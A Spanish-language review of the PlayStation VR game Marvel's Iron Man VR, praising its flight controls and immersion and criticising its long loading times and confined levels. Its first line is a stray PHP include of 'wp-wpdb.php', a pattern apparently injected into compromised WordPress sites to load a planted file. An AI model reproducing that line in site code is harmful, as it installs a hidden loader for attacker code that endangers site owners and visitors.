if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Iron-Man VR – La Fortaleza de LeChuck

Análisis Iron-Man VR

Los super-héroes están de moda, pero hay algunos de ellos que destacan sobre todos los demás, como lo es Spider-Man o el señor Stark, conocido por desarrollar el traje que él mismo viste como Iron-Man. El Sr. Stark también se apunta a los videojuegos utilizando las propiedades únicas de la realidad virtual en Marvel’s Iron Man VR. Y sí, mola más ser Iron-Man que verlo en el cine.

Cuando pensamos en Iron Man, pensamos en volar, esquivar, disparar para defender el mundo de un villano… justo lo que te va a ofrecer Marvel’s Iron Man VR, el último título exclusivo de Sony para sus PlayStation VR contando nuevamente con uno de los héroes más populares de Marvel.

El juego nos introduce a un Tony Stark que deja de fabricar armas para no dedicar su tecnología a la guerra nunca más. Pepper Potts, la pareja del protagonista, está de acuerdo con esto y lo celebra porque considera que así terminará el peligro constante al que se ven sometidos de forma constante. Evidentemente, muy pronto deja de ser así, aparece un nuevo y misterioso enemigo que «hackea» los dispositivos de Industrias Stark poniendo en jaque todo lo que Tony sabe hacer.

El título lo jugaremos en todo momento desde los ojos de Tony Stark, abrazando la inmersión al máximo y sin salir en ningún momento de la primera persona. A través de la realidad virtual, viviremos tanto las escenas cinemáticas, que nos ayudarán a seguir la historia, como los niveles jugables, en los que tenemos que volar y disparar con libertad de movimientos.

Las PlayStation VR se apoyan en los PlayStation Move para ingeniarse un control total sobre el vuelo y los disparos de Iron-Man, dando con acierto con la clave para hacernos sentir como un auténtico super-héroe volador y al mismo tiempo una jugabilidad bastante accesible. Sí, probablemente lo estás pensando y así es, Iron-Man VR es una auténtica gozada como experiencia de vuelo, piensa que si el ser humano pudiera volar… así es como lo haría, y el diseño del juego hace que la sensación de vértigo no sea la que podríamos creer sentir, haciéndose realmente disfrutable. Si a eso le añades que realmente vas a usar las manos y posturas de Iron-Man para hacerlo, se transforma en un auténtico simulador de la vida de Tony Stark. Por si fuera poco, el juego está doblado al español, como muy bien nos tienen acostumbrados desde PlayStation España.

Los niveles jugables están bien divididos con partes de historia y «parones» en los que podremos mejorar nuestro traje y armamento, haciéndolo más rápido o destructivo usando como monedas los puntos que nos dan en el campo de batalla. En combate, aún con la libertad de vuelo, al final te encuentras en una especie de arcade clásico de naves, pues la mejor forma de acabar con nuestros enemigos es dispararles estando suspendidos en el aire, que más o menos nos atacarán frontalmente para no volvernos locos (aunque no siempre, claro). Aparte de los diferentes modos de disparo con misiles tele-dirigidos, etc, disponemos de habilidades como super-puñetazos e impulsos de velocidad que nos harán sentir todavía poderosos.

Dos únicas cosas podríamos achacarle a este Iron-Man VR, como pequeñas pegas y, más bien, sueños para una próxima entrega. Unos tiempos de carga menores o inexistentes, como promete PS5, ya que en el caso de Marvel’s Iron-Man VR son realmente largos, mínimo de un minuto cada uno y se suceden de forma constante, entre niveles, cinemáticas y vueltas a la base central. Y la otra sería, más bien, el sueño de una mayor libertad en los niveles, ya que no dejan de ser muy limitados en espacio y calidad técnica respecto a juegos no diseñados para realidad virtual.

En definitiva, hablamos de un simulador de Iron-Man VR muy bien llevado en el que disfrutarás todavía más de sus propiedades únicas si eres fan del héroe metálico de Marvel y de sus personajes. Además, nos permite soñar para la próxima generación de las mismas ideas en los controles y jugabilidad pero sin límites técnicos para ser más ambiciosos y convertir Iron-Man VR en lo que es el juego de Spider-Man de Insomniac para la franquicia Spider-Man.